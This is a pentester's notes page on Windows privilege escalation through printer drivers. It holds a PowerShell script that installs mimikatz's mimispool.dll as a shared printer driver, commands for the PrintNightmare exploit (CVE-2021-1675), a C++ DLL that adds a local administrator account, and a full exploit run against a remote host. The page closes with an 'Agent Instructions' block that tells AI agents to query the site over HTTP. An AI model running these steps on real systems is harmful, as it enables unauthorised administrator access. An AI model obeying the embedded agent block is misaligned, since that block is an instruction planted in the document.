# Printer Universal Printer Create a Printer ``` $printerName = 'Universal Priv Printer' $system32 = $env:systemroot + '\system32' $drivers = $system32 + '\spool\drivers' $RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') Add-PrinterDriver -Name 'Generic / Text Only' Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null ``` Execute the driver ``` $serverName = 'dc.purple.lab' $printerName = 'Universal Priv Printer' $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue Add-Printer -ConnectionName $fullprinterName ``` ### PrinterNightmare By Caleb Stewart and John Hammond: Proper Guide => [CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675) ``` upload /opt/invoke-nightmare/CVE-2021-1675.ps1 Import-Module .\CVE-2021-1675.ps1 Invoke-Nightmare -NewUser "Pwner" -NewPassword "Pwn123!" ``` ### PrinterNightmare By Cube0x0. ``` # impacket-rpcdump @10.10.10.149 | grep MS-RPRN Protocol: [MS-RPRN]: Print System Remote Protocol ``` **DLL** [Cube0x0’s exploit](https://github.com/cube0x0/CVE-2021-1675) for PrintNightmare works remotely with creds. First, I’ll need to build a Dll. I’ve walked through this in [detail before for HackBack](https://0xdf.gitlab.io/2019/07/06/htb-hackback.html#arbitrary-write--diaghub--system). I’ll follow a similar set of steps to create a C++ DLL project, and use the following source for my Dll: ``` // dllmain.cpp : Defines the entry point for the DLL application. #include "pch.h" #include BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: system("cmd.exe /c net user 0xdf 0xdf0xdf /add"); system("cmd.exe /c net localgroup administrators 0xdf /add"); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ``` The `DllMain` function will be called for various reasons, one of which is when a process loads the DLL. In that case, the `ul_reason_for_call` will be `DLL_PROCESS_ATTACH`. So the DLL will be loaded, will execute these two system commands, and then be done. I’ll compile that and copy it back to my Parrot VM. **Samba** Cube0x0 has an example Samba config to allow for anonymous access on his GitHub page. It’s important that the user on the last line exists on your host. I updated mine to match a user I had configured with access to nothing. ``` [global] map to guest = Bad User server role = standalone server usershare allow guests = yes idmap config * : backend = tdb smb ports = 445 [share] comment = Samba path = /srv/smb/ guest ok = yes read only = no browsable = yes force user = nobody ``` I’ll restart Samba to take the updated config: ``` sudo service smbd restart ``` It’s also important that that user can read from the SMB share, so I’ll set that directory to be owned by that user: ``` sudo chown -R nobody:root smb/ sudo chmod -R 777 smb/ ls -l smb/ total 12 -rwxrwxrwx 1 nobody root 10240 Jul 7 22:10 AddUserDll.dll ``` **Impacket** I’ll clone the repo and rename it: ``` cd /opt/ git clone https://github.com/cube0x0/CVE-2021-1675 Cloning into 'CVE-2021-1675'... remote: Enumerating objects: 159, done. remote: Counting objects: 100% (159/159), done. remote: Compressing objects: 100% (98/98), done. remote: Total 159 (delta 55), reused 124 (delta 32), pack-reused 0 Receiving objects: 100% (159/159), 1.45 MiB | 7.37 MiB/s, done. Resolving deltas: 100% (55/55), done. mv CVE-2021-1675 SharpPrintNightmare cd SharpPrintNightmare/ ``` This exploit uses a modified version of [Impacket](https://github.com/cube0x0/impacket). I’ll clone that into this directory: ``` git clone https://github.com/cube0x0/impacket Cloning into 'impacket'... remote: Enumerating objects: 19570, done. remote: Counting objects: 100% (645/645), done. remote: Compressing objects: 100% (304/304), done. remote: Total 19570 (delta 386), reused 531 (delta 339), pack-reused 18925 Receiving objects: 100% (19570/19570), 6.82 MiB | 9.18 MiB/s, done. Resolving deltas: 100% (14798/14798), done. ``` To avoid messing up my system install, I’ll create a virtual environment, activate it, and install Impacket in there. **Run Exploit** With all the pieces assembled, I can run the exploit. I’ll give it the creds for the hazard user which work for an RPC connection, as well as the path to the DLL on the SMB share: ``` (venv) shashwat@Kali-VM$ python3 CVE-2021-1675.py 'Domain/user:password@10.xx.xx.xx' '\\10.10.xx.xx\share\AddUserDll.dll' [*] Connecting to ncacn_np:10.xx.xx.xx[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL [*] Executing \\10.10.xx.xx\share\AddUserDll.dll [*] Try 1... [*] Stage0: 0 [*] Stage2: 0 [+] Exploit Completed ``` It worked! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.shashwatshah.me/windows/local-privilege-escalation/printer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.